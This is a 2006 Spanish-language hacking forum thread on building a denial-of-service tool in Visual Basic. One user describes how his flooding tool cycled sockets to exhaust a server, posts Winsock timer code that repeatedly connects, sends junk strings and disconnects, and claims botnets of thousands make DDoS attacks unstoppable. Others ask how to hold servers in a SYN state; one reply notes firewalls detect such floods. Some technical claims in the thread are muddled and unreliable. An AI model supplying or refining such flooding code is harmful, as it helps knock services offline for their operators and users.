Denegación del servicio en vb

Iniciado por qiqeroot, 25 Noviembre 2006, 14:52 PM

0 Miembros y 1 Visitante están viendo este tema.

SheKeL_C$

Volks, tu iciste el turbinas, podrias explicar como lo iciste o mas bien que es lo q acia... :rolleyes:

xDie

Cita de: SheKeL_C$ en 28 Noviembre 2006, 17:36 PM
Volks, tu iciste el turbinas, podrias explicar como lo iciste o mas bien que es lo q acia... :rolleyes:
Cierto volks, estaria bueno saber como lo hiciste o publicar el source
Licence to kill!

[VolkS]

#12
es mas sencillo de lo que todos piensan...
igual ya lo explique varias veces, Alguien arriba dijo "creas 1000 sockets y los conectas"

1) Crear 1000 sockets puede crashear la pc, depende el proccesador o la memoria., conectar 1000 sockets de una no es muy recomendado para agotar el ancho de banda, porque puede dar overflow(desbordamiento de buffer)(lo mas probable)

Lo que hacie el turbinas es usar 5 sockets y adaptarse al tipo de connecion haciendo bien los request,

Conecta 5 sockets, peticiones > Request > Accept >
1er Socket envia 100 bytes
2do Socket envia 100 bytes
3er Socket envia 100 bytes
4to Socket envia 100 bytes
5to Socket envia 100 bytes
Desconnecta los 5 

Conecta 5 sockets, peticiones > Request > Accept >
1er Socket envia 100 bytes
2do Socket envia 100 bytes
3er Socket envia 100 bytes
4to Socket envia 100 bytes
5to Socket envia 100 bytes

Desconnecta los 5 

Asi susesivamente, por eso en algunas pc's no funcionaba bien ya que se necesita suficiente ancho de banda para poder colapsar alguns servidor, pero si juntas 5 o 6 pc's con diferentes conneciones sumarian 25 sockets al mismo tiempo ahciendo eso y seria mas efectivo :P.
El envio de bytes lo hacia cada cierto delay.

Lo mas importante es la connecion y desconnecion de los sockets, eso es mas importante que el simple envio de bytes.

xDie

100 bytes de que? cadena basura? peudes dar un ejemplo cortito
Licence to kill!

[VolkS]

#14
Cita de: xDie en 28 Noviembre 2006, 20:30 PM
100 bytes de que? cadena basura? peudes dar un ejemplo cortito

si, alguna cadena, para floodear apenas un poco, sin eso funciona igual, es como para darle un poco mas de poder al syn, nada mas.

un ataque sencillo seria asi.

Private Sub tmrSyn_Timer()
On Error GoTo Error
If CountSyn = 250 Then
CountSyn = 0
WSyn1.CloseSck
WSyn2.CloseSck
WSyn3.CloseSck
tmrSyn.Enabled = False
Else
End If

WSyn1.Connect
If WSyn1.State = sckconnected Then
        SynSent = "-VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOL-VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS--VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS" 
       WSyn1.SendData (SynSent & vbCrLf)
        SynSent = ""

End If

WSyn2.Connect
If WSyn2.State = sckconnected Then
        SynSent = "-VOLKS---VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS--VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS--VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS--"
        WSyn2.SendData (SynSent & vbCrLf)
        SynSent = ""

End If

WSyn3.Connect
If WSyn3.State = sckconnected Then
        SynSent = "-VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--VOLKS-VOLKS--"
        WSyn3.SendData (SynSent & vbCrLf)
        SynSent = ""

End If

WSyn1.CloseSck
WSyn2.CloseSck
WSyn3.CloseSck
CountSyn = CountSyn + 1
Error:
Call CheckConnect
End Sub


Es un ataque muy "precario" digamos, utilizando solo 3 sockets.

Conecta, revisa la connecion envia desconecta, asi 250 veces que hace el count del Syn.

xDie

garcias volks.. sabes como peudo hacer para que el servidor qeude en estado syn? osea esperando mi respuesta con winsock? para bichar syn flood gracias !
Licence to kill!

Nymphetaminito

No se puede tirar nunca a un servidor con más ancho de banda que el propio.

SYN FLOOD hoy en día lo detectan las reglas predeterminadas de iptables y cualquier firewall para Windows.

Abrir y cerrar conexiones para tratar de romper la pila TCP tampoco sirve en la mayoría de los servidores, lograrás que te banee automáticamente y si no lo hace, de todas formas no lograrás romperle la pila porque al invocar a Sock.Close envía la flag RST activada y el server cierra la conexión.

De cualquier modo,  para trabajar al nivel necesario para ese tipo de ataques se puede usar las funciones de WinPCap.

[VolkS]

Cita de: Nymphetaminito en 29 Noviembre 2006, 01:17 AM
No se puede tirar nunca a un servidor con más ancho de banda que el propio.

SYN FLOOD hoy en día lo detectan las reglas predeterminadas de iptables y cualquier firewall para Windows.

Abrir y cerrar conexiones para tratar de romper la pila TCP tampoco sirve en la mayoría de los servidores, lograrás que te banee automáticamente y si no lo hace, de todas formas no lograrás romperle la pila porque al invocar a Sock.Close envía la flag RST activada y el server cierra la conexión.

De cualquier modo,  para trabajar al nivel necesario para ese tipo de ataques se puede usar las funciones de WinPCap.

obviamente con 1 sola pc es muy dificil, pero 1000 bots haciendo 1 syn de 200 sockets si se puede, y de ultima se packetea el server a puros bytes, no hay forma de parar un ataque ddos, por mas firewall que tengas, si tenes alrrededor de 10k de bots, no se pueden parar.

xDie

eso ya seria un D.D.o.S, pero saben como hacer eso que poregunte
Licence to kill!